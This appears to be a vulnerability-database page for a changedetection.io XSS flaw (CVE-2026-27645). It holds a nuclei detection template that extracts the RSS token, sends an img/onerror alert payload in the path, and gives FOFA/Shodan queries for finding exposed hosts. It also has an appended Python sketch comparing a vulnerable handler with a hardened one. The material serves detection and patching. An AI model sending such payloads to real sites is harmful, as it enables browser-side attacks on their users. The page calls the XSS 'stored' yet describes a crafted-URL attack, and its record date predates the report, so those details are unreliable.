Changedetection.io RSS Single Watch - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48 · Reported by ProjectDiscovery · Type: nuclei · 🔗 github.com

Changedetection.io RSS Single Watch: stored XSS via the UUID path parameter of the RSS endpoint; the victim must visit a crafted URL.

Code
id: CVE-2026-27645

info:
  name: Changedetection.io RSS Single Watch - Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
    changedetection.io < 0.54.1 contains a stored XSS caused by unescaped reflection of the UUID path parameter in the RSS single-watch endpoint, which lets remote attackers execute JavaScript in a victim's browser; exploitation requires the victim to visit a crafted URL.
  impact: |
    Attackers can execute arbitrary JavaScript in users' browsers, leading to session hijacking or other client-side attacks.
  remediation: |
    Update to version 0.54.1 or later.
  reference:
    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-mw8m-398g-h89w
    - https://github.com/dgtlmoon/changedetection.io/commit/a385c89abf44b52fcfa20c7c6a6dd3047c4c1eb5
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27645
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-27645
    cwe-id: CWE-79
    epss-score: 0.00445
    epss-percentile: 0.35714
  metadata:
    max-request: 2
    verified: true
    fofa-query: title="Change Detection"
    shodan-query: http.title:"Change Detection"
  tags: cve,cve2026,xss,changedetection,rss

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "rss?token=", "Change Detection")'
        internal: true

    extractors:
      - type: regex
        name: rss_token
        part: body
        group: 1
        regex:
          - 'rss\?token=([a-f0-9]{16,64})'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/rss/watch/%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E?token={{rss_token}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<img src=x onerror=alert(document.domain)>", "Watch with UUID")'
        condition: and
# digest: 4a0a0047304502200486cc763ba8fb628a0da7dd187334ca160ae7f96c11938ccfed80091810d32a022100b354bd4f128d7c40a6c03a6eaf88a9a3636172039b57048a47e4986d8876e5c6:922c64590222798bb761d5b6d8e72950
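As an added illustration (not changedetection.io's code and not part of the nuclei template above), the unescaped-reflection pattern the description refers to, beside a hardened handler that validates the identifier as a UUID and escapes it on output; `reflects_unescaped` mirrors the template's matcher, which looks for the marker echoed verbatim in the 404 body. The handler names and HTML bodies are assumptions.

```python
import html
import uuid

# Constructed marker, identical to the payload the nuclei template sends.
XSS_MARKER = "<img src=x onerror=alert(document.domain)>"


def vulnerable_not_found(uuid_param: str) -> tuple[int, str]:
    """Illustrative vulnerable pattern (assumed, not the project's code):
    the path parameter is interpolated into an HTML 404 body unescaped."""
    body = f"<html><body>Watch with UUID {uuid_param} not found</body></html>"
    return 404, body


def hardened_not_found(uuid_param: str) -> tuple[int, str]:
    """Hardened form: reject anything that is not a UUID without echoing it,
    and escape the validated value before placing it in HTML."""
    try:
        parsed = uuid.UUID(uuid_param)
    except ValueError:
        # Malformed identifier: generic message, attacker input never rendered.
        return 400, "<html><body>Invalid watch identifier</body></html>"
    # Defence in depth: html.escape even though the value is now canonical.
    safe = html.escape(str(parsed))
    return 404, f"<html><body>Watch with UUID {safe} not found</body></html>"


def reflects_unescaped(body: str, marker: str) -> bool:
    """Detection check equivalent to the template's matcher: the raw marker
    appears verbatim in the response body (escaped output would not match)."""
    return marker in body


def demo() -> dict:
    """Run both handlers against the marker and a valid UUID for comparison."""
    valid = "123e4567-e89b-12d3-a456-426614174000"
    return {
        "vulnerable": reflects_unescaped(vulnerable_not_found(XSS_MARKER)[1], XSS_MARKER),
        "hardened": reflects_unescaped(hardened_not_found(XSS_MARKER)[1], XSS_MARKER),
        "hardened_valid_status": hardened_not_found(valid)[0],
    }


if __name__ == "__main__":
    print(demo())
```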


Vulners record, current as of 27 Feb 2026 07:51: Vulners AI Score 6 (Medium risk), CVSS 3.1 6.1, EPSS 0.00445.